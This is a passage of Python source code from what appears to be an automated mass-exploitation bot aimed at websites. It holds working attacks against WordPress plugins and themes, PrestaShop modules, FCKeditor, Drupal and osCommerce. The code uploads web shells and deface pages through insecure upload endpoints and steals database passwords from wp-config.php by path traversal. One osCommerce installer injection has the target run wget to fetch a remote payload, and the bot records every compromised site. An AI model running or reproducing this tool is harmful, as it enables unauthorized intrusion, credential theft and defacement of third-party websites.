1780. ShellCheck = requests.get('http://' + site +
1781. '/wp-content/themes/beach_apollo/advance/plugins/revslider/temp/update_extract/vuln.php', timeout=5)
1782. if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
1783. self.Print_vuln_Shell(
1784. site + '/wp-content/themes/beach_apollo/advance/plugins/revslider/temp/update_extract/vuln.php')
1785. with open('result/Shell_results.txt', 'a') as writer:
1786. writer.write(
1787. site + '/wp-content/themes/beach_apollo/advance/plugins/revslider/temp/update_extract/vuln.php' + '\n')
1788. self.Print_Vuln_index(
1789. site + '/wp-content/themes/beach_apollo/advance/plugins/revslider/temp/update_extract/pwn.gif')
1790. with open('result/Index_results.txt', 'a') as writer:
1791. writer.write(
1792. site + '/wp-content/themes/beach_apollo/advance/plugins/revslider/temp/update_extract/pwn.gif' + '\n')
1793. self.Revslider_Config(site)
1794. else:
1795. self.Revslider_Config(site)
1796. elif '/wp-content/themes/cuckootap/' in CheckRevslider.text.encode('utf-8'):
1797. requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
1798. CheckRev8 = requests.get('http://' + site +
1799. '/wp-content/themes/cuckootap/framework/plugins/revslider/temp/update_extract/pwn.gif', timeout=5)
1800. if 'GIF89a' in CheckRev8.text.encode('utf-8'):
1801. ShellCheck = requests.get('http://' + site +
1802. '/wp-content/themes/cuckootap/framework/plugins/revslider/temp/update_extract/vuln.php', timeout=5)
1803. if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
1804. self.Print_vuln_Shell(
1805. site + '/wp-content/themes/cuckootap/framework/plugins/revslider/temp/update_extract/vuln.php')
1806. with open('result/Shell_results.txt', 'a') as writer:
1807. writer.write(
1808. site + '/wp-content/themes/cuckootap/framework/plugins/revslider/temp/update_extract/vuln.php' + '\n')
1809. self.Print_Vuln_index(
1810. site + '/wp-content/themes/cuckootap/framework/plugins/revslider/temp/update_extract/pwn.gif')
1811. with open('result/Index_results.txt', 'a') as writer:
1812. writer.write(
1813. site + '/wp-content/themes/cuckootap/framework/plugins/revslider/temp/update_extract/pwn.gif' + '\n')
1814. self.Revslider_Config(site)
1815. else:
1816. self.Revslider_Config(site)
1817. elif '/wp-content/themes/pindol/' in CheckRevslider.text.encode('utf-8'):
1818. requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
1819. CheckRev9 = requests.get('http://' + site +
1820. '/wp-content/themes/pindol/revslider/temp/update_extract/pwn.gif', timeout=5)
1821. if 'GIF89a' in CheckRev9.text.encode('utf-8'):
1822. ShellCheck = requests.get('http://' + site +
1823. '/wp-content/themes/pindol/revslider/temp/update_extract/vuln.php', timeout=5)
1824. if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
1825. self.Print_vuln_Shell(
1826. site + '/wp-content/themes/pindol/revslider/temp/update_extract/vuln.php')
1827. with open('result/Shell_results.txt', 'a') as writer:
1828. writer.write(
1829. site + '/wp-content/themes/pindol/revslider/temp/update_extract/vuln.php' + '\n')
1830. self.Print_Vuln_index(site + '/wp-content/themes/pindol/revslider/temp/update_extract/pwn.gif')
1831. with open('result/Index_results.txt', 'a') as writer:
1832. writer.write(
1833. site + '/wp-content/themes/pindol/revslider/temp/update_extract/pwn.gif' + '\n')
1834. self.Revslider_Config(site)
1835. else:
1836. self.Revslider_Config(site)
1837. elif '/wp-content/themes/designplus/' in CheckRevslider.text.encode('utf-8'):
1838. requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
1839. CheckRev10 = requests.get('http://' + site +
1840. '/wp-content/themes/designplus/framework/plugins/revslider/temp/update_extract/pwn.gif', timeout=5)
1841. if 'GIF89a' in CheckRev10.text.encode('utf-8'):
1842. ShellCheck = requests.get('http://' + site +
1843. '/wp-content/themes/designplus/framework/plugins/revslider/temp/update_extract/vuln.php', timeout=5)
1844. if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
1845. self.Print_vuln_Shell(
1846. site + '/wp-content/themes/designplus/framework/plugins/revslider/temp/update_extract/vuln.php')
1847. with open('result/Shell_results.txt', 'a') as writer:
1848. writer.write(
1849. site + '/wp-content/themes/designplus/framework/plugins/revslider/temp/update_extract/vuln.php' + '\n')
1850. self.Print_Vuln_index(
1851. site + '/wp-content/themes/designplus/framework/plugins/revslider/temp/update_extract/pwn.gif')
1852. with open('result/Index_results.txt', 'a') as writer:
1853. writer.write(
1854. site + '/wp-content/themes/designplus/framework/plugins/revslider/temp/update_extract/pwn.gif' + '\n')
1855. self.Revslider_Config(site)
1856. else:
1857. self.Revslider_Config(site)
1858. elif '/wp-content/themes/rarebird/' in CheckRevslider.text.encode('utf-8'):
1859. requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
1860. CheckRev11 = requests.get('http://' + site +
1861. '/wp-content/themes/rarebird/framework/plugins/revslider/temp/update_extract/pwn.gif', timeout=5)
1862. if 'GIF89a' in CheckRev11.text.encode('utf-8'):
1863. ShellCheck = requests.get('http://' + site +
1864. '/wp-content/themes/rarebird/framework/plugins/revslider/temp/update_extract/vuln.php', timeout=5)
1865. if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
1866. self.Print_vuln_Shell(
1867. site + '/wp-content/themes/rarebird/framework/plugins/revslider/temp/update_extract/vuln.php')
1868. with open('result/Shell_results.txt', 'a') as writer:
1869. writer.write(
1870. site + '/wp-content/themes/rarebird/framework/plugins/revslider/temp/update_extract/vuln.php' + '\n')
1871. self.Print_Vuln_index(
1872. site + '/wp-content/themes/rarebird/framework/plugins/revslider/temp/update_extract/pwn.gif')
1873. with open('result/Index_results.txt', 'a') as writer:
1874. writer.write(
1875. site + '/wp-content/themes/rarebird/framework/plugins/revslider/temp/update_extract/pwn.gif' + '\n')
1876. self.Revslider_Config(site)
1877.  
1878. else:
1879. self.Revslider_Config(site)
1880. elif '/wp-content/themes/Avada/' in CheckRevslider.text.encode('utf-8'):
1881. requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
1882. CheckRev12 = requests.get('http://' + site +
1883. '/wp-content/themes/andre/framework/plugins/revslider/temp/update_extract/pwn.gif', timeout=5)
1884. if 'GIF89a' in CheckRev12.text.encode('utf-8'):
1885. ShellCheck = requests.get('http://' + site +
1886. '/wp-content/themes/andre/framework/plugins/revslider/temp/update_extract/vuln.php', timeout=5)
1887. if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
1888. self.Print_vuln_Shell(
1889. site + '/wp-content/themes/andre/framework/plugins/revslider/temp/update_extract/vuln.php')
1890. with open('result/Shell_results.txt', 'a') as writer:
1891. writer.write(
1892. site + '/wp-content/themes/andre/framework/plugins/revslider/temp/update_extract/vuln.php' + '\n')
1893. self.Print_Vuln_index(
1894. site + '/wp-content/themes/andre/framework/plugins/revslider/temp/update_extract/pwn.gif')
1895. with open('result/Index_results.txt', 'a') as writer:
1896. writer.write(
1897. site + '/wp-content/themes/andre/framework/plugins/revslider/temp/update_extract/pwn.gif' + '\n')
1898. self.Revslider_Config(site)
1899. else:
1900. self.Revslider_Config(site)
1901. else:
1902. self.Print_NotVuln('revslider', site)
1903. except:
1904. self.Print_NotVuln('revslider', site)
1905.  
1906. def Revslider_Config(self, site):
1907. try:
1908. Exp = 'http://' + site + \
1909. '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'
1910. GetConfig = requests.get(Exp, timeout=5)
1911. if 'DB_PASSWORD' in GetConfig.text.encode('utf-8'):
1912. self.Print_vuln_Config(site)
1913. with open('result/Config_results.txt', 'a') as ww:
1914. ww.write('Full Config Path : ' + Exp + '\n')
1915. try:
1916. Gethost = re.findall("'DB_HOST', '(.*)'", GetConfig.text.encode('utf-8'))
1917. Getuser = re.findall("'DB_USER', '(.*)'", GetConfig.text.encode('utf-8'))
1918. Getpass = re.findall("'DB_PASSWORD', '(.*)'", GetConfig.text.encode('utf-8'))
1919. Getdb = re.findall("'DB_NAME', '(.*)'", GetConfig.text.encode('utf-8'))
1920. with open('result/Config_results.txt', 'a') as ww:
1921. ww.write(' Host: ' + Gethost[0] + '\n' + ' user: ' + Getuser[0] +
1922. '\n' + ' pass: ' + Getpass[0] + '\n' + ' DB: ' + Getdb[
1923. 0] + '\n---------------------\n')
1924. self.Revslider_css(site)
1925. except:
1926. self.Revslider_css(site)
1927. else:
1928. self.Revslider_css(site)
1929. except:
1930. self.Revslider_css(site)
1931.  
1932. def viral_optins(self, site):
1933. try:
1934. defaceFile = {
1935. 'Filedata': ('vuln.txt', open(self.TextindeX, 'rb'), 'text/html')
1936. }
1937. x = requests.post('http://' + site + '/wp-content/plugins/viral-optins/api/uploader/file-uploader.php',
1938. files=defaceFile, timeout=5)
1939. if 'id="wpvimgres"' in x.text.encode('utf-8'):
1940. uploader = site + '/wp-content/uploads/20' + self.year + '/' + self.month + '/vuln.txt'
1941. GoT = requests.get('http://' + uploader, timeout=5)
1942. find = re.findall('<img src="http://(.*)" height="', x.text.encode('utf-8'))
1943. GoT2 = requests.get('http://' + find[0], timeout=5)
1944. print find[0]
1945. if 'Vuln!!' in GoT.text.encode('utf-8'):
1946. self.Print_Vuln_index(site + '/wp-content/uploads/20' + self.year + '/' + self.month + '/vuln.txt')
1947. with open('result/Index_results.txt', 'a') as writer:
1948. writer.write(site + '/wp-content/uploads/20' + self.year + '/' + self.month + '/vuln.txt' + '\n')
1949. elif 'Vuln!!' in GoT2.text.encode('utf-8'):
1950. self.Print_Vuln_index(find[0])
1951. with open('result/Index_results.txt', 'a') as writer:
1952. writer.write(site + find[0] + '\n')
1953. else:
1954. self.Print_NotVuln('viral optins', site)
1955. else:
1956. self.Print_NotVuln('viral optins', site)
1957. except:
1958. self.Print_NotVuln('viral optins', site)
1959.  
1960.  
1961. def Woocomrece(self, site):
1962. try:
1963. Exp = 'http://' + site + '/wp-admin/admin-ajax.php'
1964. Postdata = {'action': 'nm_personalizedproduct_upload_file', 'name': 'upload.php'}
1965. FileData = {'file': (self.pagelinesExploitShell.split('/')[1], open(self.pagelinesExploitShell, 'rb'),
1966. 'multipart/form-data')}
1967. GoT = requests.post(Exp, files=FileData, data=Postdata, timeout=5)
1968. if GoT.status_code == 200 or 'success' in GoT.text.encode('utf-8'):
1969. UploadPostPath = 'http://' + site + '/wp-content/uploads/product_files/upload.php'
1970. CheckShell = requests.get(UploadPostPath, timeout=5)
1971. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
1972. shellChecker = requests.get('http://' + site + '/wp-content/vuln.php', timeout=5)
1973. if 'Vuln!!' in shellChecker.text.encode('utf-8'):
1974. self.Print_vuln_Shell(site + '/wp-content/vuln.php')
1975. with open('result/Shell_results.txt', 'a') as writer:
1976. writer.write(site + '/wp-content/vuln.php' + '\n')
1977. IndexCheck = requests.get('http://' + site + '/vuln.htm', timeout=5)
1978. if 'Vuln!!' in IndexCheck.text.encode('utf-8'):
1979. self.Print_Vuln_index(site + '/vuln.htm')
1980. with open('result/Index_results.txt', 'a') as writer:
1981. writer.write(site + '/vuln.htm' + '\n')
1982. else:
1983. self.Print_NotVuln('Woocomrece', site)
1984. else:
1985. self.Print_NotVuln('Woocomrece', site)
1986. else:
1987. self.Print_NotVuln('Woocomrece', site)
1988. except:
1989. self.Print_NotVuln('Woocomrece', site)
1990.  
1991.  
1992. def FckPath(self, zzz):
1993. try:
1994. find = re.findall(',"(.*)","', zzz)
1995. path = find[0].strip()
1996. return path
1997. except:
1998. pass
1999.  
2000. def FckEditor(self, site):
2001. try:
2002. exp2 = '/fckeditor/editor/filemanager/connectors/php/upload.php?Type=Media'
2003. try:
2004. CheckVuln = requests.get('http://' + site + exp2, timeout=5)
2005. if 'OnUploadCompleted(202' in CheckVuln.text.encode('utf-8'):
2006. headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0',
2007. 'Accept': '*/*'}
2008. exp = 'http://' + site + exp2
2009. po = {'Content_Type': 'form-data'}
2010. fil = {'NewFile': open(self.Jce_Deface_image, 'rb')}
2011. rr = requests.post(exp, data=po, headers=headers, timeout=10, files=fil)
2012. if '.gif' in rr.text.encode('utf-8'):
2013. zart = self.FckPath(rr.text.encode('utf-8'))
2014. x = 'http://' + site + str(zart)
2015. wcheck2 = requests.get(x, timeout=5)
2016. if wcheck2.status_code == 200:
2017. check_deface = requests.get(x, timeout=10)
2018. if 'GIF89a' in check_deface.text.encode('utf-8'):
2019. self.Print_Vuln_index(site + str(zart))
2020. with open('result/Index_results.txt', 'a') as writer:
2021. writer.write(site + str(zart) + '\n')
2022. else:
2023. self.Print_NotVuln('fckeditor', site)
2024. else:
2025. self.Print_NotVuln('fckeditor', site)
2026. else:
2027. self.Print_NotVuln('fckeditor', site)
2028. else:
2029. self.Print_NotVuln('fckeditor', site)
2030. except:
2031. self.Print_NotVuln('fckeditor', site)
2032. except:
2033. self.Print_NotVuln('fckeditor', site)
2034.  
2035. def Drupal_Sqli_Addadmin(self, site):
2036. os.system('python files/adminTakeoverdupal.py -t http://' + site + ' -u pwndrupal -p pwndrupal')
2037.  
2038. def osCommerce(self, site):
2039. try:
2040. CheckVuln = requests.get('http://' + site + '/install/index.php', timeout=5)
2041. if 'Welcome to osCommerce' in CheckVuln.text.encode('utf-8') or CheckVuln.status_code == 200:
2042. Exp = site + '/install/install.php?step=4'
2043. data = {
2044. 'DIR_FS_DOCUMENT_ROOT': './'
2045. }
2046. shell = '\');'
2047. shell += 'system("wget https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/OsComPayLoad.php");'
2048. shell += '/*'
2049. deface = '\');'
2050. deface += 'system("echo Vuln!! patch it Now!> ../../vuln.htm");'
2051. deface += '/*'
2052. data['DB_DATABASE'] = deface
2053. r = requests.post(url='http://' + Exp, data=data, timeout=5)
2054. if r.status_code == 200:
2055. requests.get('http://' + site + '/install/includes/configure.php', timeout=5)
2056. CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
2057. if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
2058. self.Print_Vuln_index(site + '/vuln.htm')
2059. with open('result/Index_results.txt', 'a') as writer:
2060. writer.write(site + '/vuln.txt' + '\n')
2061. try:
2062. data['DB_DATABASE'] = shell
2063. requests.post(url='http://' + Exp, data=data, timeout=5)
2064. requests.get('http://' + site + '/install/includes/configure.php', timeout=5)
2065. requests.get('http://' + site + '/install/includes/OsComPayLoad.php', timeout=5)
2066. Checkshell = requests.get('http://' + site + '/install/includes/vuln.php', timeout=5)
2067. if 'Vuln!!' in Checkshell.text.encode('utf-8'):
2068. self.Print_vuln_Shell(site + '/wp-content/vuln.php')
2069. with open('result/Shell_results.txt', 'a') as writer:
2070. writer.write(site + '/wp-content/vuln.php' + '\n')
2071. except:
2072. pass
2073. else:
2074. self.Print_NotVuln('osCommerce RCE', site)
2075. else:
2076. self.Print_NotVuln('osCommerce RCE', site)
2077. else:
2078. self.Print_NotVuln('osCommerce RCE', site)
2079. except:
2080. self.Print_NotVuln('osCommerce RCE', site)
2081.  
2082. def columnadverts(self, site):
2083. try:
2084. Exp = site + '/modules/columnadverts/uploadimage.php'
2085. FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
2086. FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
2087. GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
2088. if 'success' in GoT.text.encode('utf-8'):
2089. IndexPath = '/modules/columnadverts/slides/' + self.Jce_Deface_image.split('/')[1]
2090. CheckIndex = requests.get('http://' + site + IndexPath, timeout=5)
2091. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
2092. self.Print_Vuln_index(IndexPath)
2093. with open('result/Index_results.txt', 'a') as writer:
2094. writer.write(IndexPath + '\n')
2095. requests.post('http://' + Exp, files=FileDataShell, timeout=5)
2096. ShellPath = '/modules/columnadverts/slides/' + self.ShellPresta.split('/')[1]
2097. CheckShell = requests.get('http://' + site + ShellPath, timeout=5)
2098. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
2099. self.Print_vuln_Shell(site + ShellPath)
2100. with open('result/Shell_results.txt', 'a') as writer:
2101. writer.write(site + ShellPath + '\n')
2102. else:
2103. self.Print_NotVuln('columnadverts', site)
2104. else:
2105. self.Print_NotVuln('columnadverts', site)
2106. except:
2107. self.Print_NotVuln('columnadverts', site)
2108.  
2109. def soopamobile(self, site):
2110. try:
2111. Exp = site + '/modules/soopamobile/uploadimage.php'
2112. FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
2113. FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
2114. GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
2115. if 'success' in GoT.text.encode('utf-8'):
2116. IndexPath = '/modules/soopamobile/slides/' + self.Jce_Deface_image.split('/')[1]
2117. CheckIndex = requests.get('http://' + site + IndexPath, timeout=5)
2118. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
2119. self.Print_Vuln_index(IndexPath)
2120. with open('result/Index_results.txt', 'a') as writer:
2121. writer.write(IndexPath + '\n')
2122. requests.post('http://' + Exp, files=FileDataShell, timeout=5)
2123. ShellPath = '/modules/soopamobile/slides/' + self.ShellPresta.split('/')[1]
2124. CheckShell = requests.get('http://' + site + ShellPath, timeout=5)
2125. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
2126. self.Print_vuln_Shell(ShellPath)
2127. with open('result/Shell_results.txt', 'a') as writer:
2128. writer.write(ShellPath + '\n')
2129. else:
2130. self.Print_NotVuln('soopamobile', site)
2131. else:
2132. self.Print_NotVuln('soopamobile', site)
2133. except:
2134. self.Print_NotVuln('soopamobile', site)
2135.  
2136.  
2137. def soopabanners(self, site):
2138. try:
2139. Exp = site + '/modules/soopabanners/uploadimage.php'
2140. FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
2141. FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
2142. GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
2143. if 'success' in GoT.text.encode('utf-8'):
2144. IndexPath = '/modules/soopabanners/slides/' + self.Jce_Deface_image.split('/')[1]
2145. CheckIndex = requests.get('http://' + site + IndexPath, timeout=5)
2146. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
2147. self.Print_Vuln_index(IndexPath)
2148. with open('result/Index_results.txt', 'a') as writer:
2149. writer.write(IndexPath + '\n')
2150. requests.post('http://' + Exp, files=FileDataShell, timeout=5)
2151. ShellPath = '/modules/soopabanners/slides/' + self.ShellPresta.split('/')[1]
2152. CheckShell = requests.get('http://' + site + ShellPath, timeout=5)
2153. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
2154. self.Print_vuln_Shell(ShellPath)
2155. with open('result/Shell_results.txt', 'a') as writer:
2156. writer.write(ShellPath + '\n')
2157. else:
2158. self.Print_NotVuln('soopabanners', site)
2159. else:
2160. self.Print_NotVuln('soopabanners', site)
2161. except:
2162. self.Print_NotVuln('soopabanners', site)
2163.  
2164.  
2165. def vtermslideshow(self, site):
2166. try:
2167. Exp = site + '/modules/vtermslideshow/uploadimage.php'
2168. FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
2169. FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
2170. GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
2171. if 'success' in GoT.text.encode('utf-8'):
2172. IndexPath = '/modules/vtermslideshow/slides/' + self.Jce_Deface_image.split('/')[1]
2173. CheckIndex = requests.get('http://' + site + IndexPath, timeout=5)
2174. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
2175. self.Print_Vuln_index(IndexPath)
2176. with open('result/Index_results.txt', 'a') as writer:
2177. writer.write(IndexPath + '\n')
2178. requests.post('http://' + Exp, files=FileDataShell, timeout=5)
2179. ShellPath = '/modules/vtermslideshow/slides/' + self.ShellPresta.split('/')[1]
2180. CheckShell = requests.get('http://' + site + ShellPath, timeout=5)
2181. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
2182. self.Print_vuln_Shell(ShellPath)
2183. with open('result/Shell_results.txt', 'a') as writer:
2184. writer.write(ShellPath + '\n')
2185. else:
2186. self.Print_NotVuln('vtermslideshow', site)
2187. else:
2188. self.Print_NotVuln('vtermslideshow', site)
2189. except:
2190. self.Print_NotVuln('vtermslideshow', site)
2191.  
2192. def simpleslideshow(self, site):
2193. try:
2194. Exp = site + '/modules/simpleslideshow/uploadimage.php'
2195. FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
2196. FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
2197. GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
2198. if 'success' in GoT.text.encode('utf-8'):
2199. IndexPath = '/modules/simpleslideshow/slides/' + self.Jce_Deface_image.split('/')[1]
2200. CheckIndex = requests.get('http://' + site + IndexPath, timeout=5)
2201. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
2202. self.Print_Vuln_index(IndexPath)
2203. with open('result/Index_results.txt', 'a') as writer:
2204. writer.write(IndexPath + '\n')
2205. requests.post('http://' + Exp, files=FileDataShell, timeout=5)
2206. ShellPath = '/modules/simpleslideshow/slides/' + self.ShellPresta.split('/')[1]
2207. CheckShell = requests.get('http://' + site + ShellPath, timeout=5)
2208. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
2209. self.Print_vuln_Shell(ShellPath)
2210. with open('result/Shell_results.txt', 'a') as writer:
2211. writer.write(ShellPath + '\n')
2212. else:
2213. self.Print_NotVuln('simpleslideshow', site)
2214. else:
2215. self.Print_NotVuln('simpleslideshow', site)
2216. except:
2217. self.Print_NotVuln('simpleslideshow', site)
2218.  
2219. def productpageadverts(self, site):
2220. try:
2221. Exp = site + '/modules/productpageadverts/uploadimage.php'
2222. FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
2223. FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
2224. GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
2225. if 'success' in GoT.text.encode('utf-8'):
2226. IndexPath = '/modules/productpageadverts/slides/' + self.Jce_Deface_image.split('/')[1]
2227. CheckIndex = requests.get('http://' + site + IndexPath, timeout=5)
2228. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
2229. self.Print_Vuln_index(IndexPath)
2230. with open('result/Index_results.txt', 'a') as writer:
2231. writer.write(IndexPath + '\n')
2232. requests.post('http://' + Exp, files=FileDataShell, timeout=5)
2233. ShellPath = '/modules/productpageadverts/slides/' + self.ShellPresta.split('/')[1]
2234. CheckShell = requests.get('http://' + site + ShellPath, timeout=5)
2235. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
2236. self.Print_vuln_Shell(ShellPath)
2237. with open('result/Shell_results.txt', 'a') as writer:
2238. writer.write(ShellPath + '\n')
2239. else:
2240. self.Print_NotVuln('productpageadverts', site)
2241. else:
2242. self.Print_NotVuln('productpageadverts', site)
2243. except:
2244. self.Print_NotVuln('productpageadverts', site)
2245.  
2246. def homepageadvertise(self, site):
2247. try:
2248. Exp = site + '/modules/homepageadvertise/uploadimage.php'
2249. FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
2250. FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
2251. GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
2252. if 'success' in GoT.text.encode('utf-8'):
2253. IndexPath = '/modules/homepageadvertise/slides/' + self.Jce_Deface_image.split('/')[1]
2254. CheckIndex = requests.get('http://' + site + IndexPath, timeout=5)
2255. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
2256. self.Print_Vuln_index(IndexPath)
2257. with open('result/Index_results.txt', 'a') as writer:
2258. writer.write(IndexPath + '\n')
2259. requests.post('http://' + Exp, files=FileDataShell, timeout=5)
2260. ShellPath = '/modules/homepageadvertise/slides/' + self.ShellPresta.split('/')[1]
2261. CheckShell = requests.get('http://' + site + ShellPath, timeout=5)
2262. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
2263. self.Print_vuln_Shell(ShellPath)
2264. with open('result/Shell_results.txt', 'a') as writer:
2265. writer.write(ShellPath + '\n')
2266. else:
2267. self.Print_NotVuln('homepageadvertise', site)
2268. else:
2269. self.Print_NotVuln('homepageadvertise', site)
2270. except:
2271. self.Print_NotVuln('homepageadvertise', site)
2272.  
2273. def homepageadvertise2(self, site):
2274. try:
2275. Exp = site + '/modules/homepageadvertise2/uploadimage.php'
2276. FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
2277. FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
2278. GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
2279. if 'success' in GoT.text.encode('utf-8'):
2280. IndexPath = '/modules/homepageadvertise2/slides/' + self.Jce_Deface_image.split('/')[1]
2281. CheckIndex = requests.get('http://' + site + IndexPath, timeout=5)
2282. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
2283. self.Print_Vuln_index(IndexPath)
2284. with open('result/Index_results.txt', 'a') as writer:
2285. writer.write(IndexPath + '\n')
2286. requests.post('http://' + Exp, files=FileDataShell, timeout=5)
2287. ShellPath = '/modules/homepageadvertise2/slides/' + self.ShellPresta.split('/')[1]
2288. CheckShell = requests.get('http://' + site + ShellPath, timeout=5)
2289. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
2290. self.Print_vuln_Shell(ShellPath)
2291. with open('result/Shell_results.txt', 'a') as writer:
2292. writer.write(ShellPath + '\n')
2293. else:
2294. self.Print_NotVuln('homepageadvertise2', site)
2295. else:
2296. self.Print_NotVuln('homepageadvertise2', site)
2297. except:
2298. self.Print_NotVuln('homepageadvertise2', site)
2299.  
2300. def jro_homepageadvertise(self, site):
2301. try:
2302. Exp = site + '/modules/jro_homepageadvertise/uploadimage.php'
2303. FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
2304. FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
2305. GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
2306. if 'success' in GoT.text.encode('utf-8'):
2307. IndexPath = '/modules/jro_homepageadvertise/slides/' + self.Jce_Deface_image.split('/')[1]
2308. CheckIndex = requests.get('http://' + site + IndexPath, timeout=5)
2309. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
2310. self.Print_Vuln_index(IndexPath)
2311. with open('result/Index_results.txt', 'a') as writer:
2312. writer.write(IndexPath + '\n')
2313. requests.post('http://' + Exp, files=FileDataShell, timeout=5)
2314. ShellPath = '/modules/jro_homepageadvertise/slides/' + self.ShellPresta.split('/')[1]
2315. CheckShell = requests.get('http://' + site + ShellPath, timeout=5)
2316. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
2317. self.Print_vuln_Shell(ShellPath)
2318. with open('result/Shell_results.txt', 'a') as writer:
2319. writer.write(ShellPath + '\n')
2320. else:
2321. self.Print_NotVuln('jro_homepageadvertise', site)
2322. else:
2323. self.Print_NotVuln('jro_homepageadvertise', site)
2324. except:
2325. self.Print_NotVuln('jro_homepageadvertise', site)
2326.  
2327. def attributewizardpro(self, site):
2328. try:
2329. Exp = site + '/modules/attributewizardpro/file_upload.php'
2330. FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
2331. FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
2332. GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
2333. if self.Jce_Deface_image.split('/')[1] in GoT.text.encode('utf-8'):
2334. Index = GoT.text.encode('utf-8').split('|||')[0]
2335. print Index
2336. IndexPath = site + '/modules/attributewizardpro/file_uploads/' + Index
2337. CheckIndex = requests.get('http://' + IndexPath, timeout=5)
2338. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
2339. self.Print_Vuln_index(IndexPath)
2340. with open('result/Index_results.txt', 'a') as writer:
2341. writer.write(IndexPath + '\n')
2342. Got2 = requests.post('http://' + Exp, files=FileDataShell, timeout=5)
2343. if self.ShellPresta.split('/')[1] in GoT.text.encode('utf-8'):
2344. Shell = Got2.text.encode('utf-8').split('|||')[0]
2345. ShellPath = site + '/modules/attributewizardpro/file_uploads/' + Shell
2346. CheckShell = requests.get('http://' + ShellPath, timeout=5)
2347. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
2348. self.Print_vuln_Shell(ShellPath)
2349. with open('result/Shell_results.txt', 'a') as writer:
2350. writer.write(ShellPath + '\n')
2351. else:
2352. self.Print_NotVuln('attributewizardpro', site)
2353. else:
2354. self.Print_NotVuln('attributewizardpro', site)
2355. except:
2356. self.Print_NotVuln('attributewizardpro', site)
2357.  
2358.  
2359. def attributewizardpro2(self, site):
2360. try:
2361. Exp = site + '/modules/1attributewizardpro/file_upload.php'
2362. FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
2363. FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
2364. GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
2365. if self.Jce_Deface_image.split('/')[1] in GoT.text.encode('utf-8'):
2366. Index = GoT.text.encode('utf-8').split('|||')[0]
2367. print Index
2368. IndexPath = site + '/modules/1attributewizardpro/file_uploads/' + Index
2369. CheckIndex = requests.get('http://' + IndexPath, timeout=5)
2370. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
2371. self.Print_Vuln_index(IndexPath)
2372. with open('result/Index_results.txt', 'a') as writer:
2373. writer.write(IndexPath + '\n')
2374. Got2 = requests.post('http://' + Exp, files=FileDataShell, timeout=5)
2375. if self.ShellPresta.split('/')[1] in GoT.text.encode('utf-8'):
2376. Shell = Got2.text.encode('utf-8').split('|||')[0]
2377. ShellPath = site + '/modules/1attributewizardpro/file_uploads/' + Shell
2378. CheckShell = requests.get('http://' + ShellPath, timeout=5)
2379. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
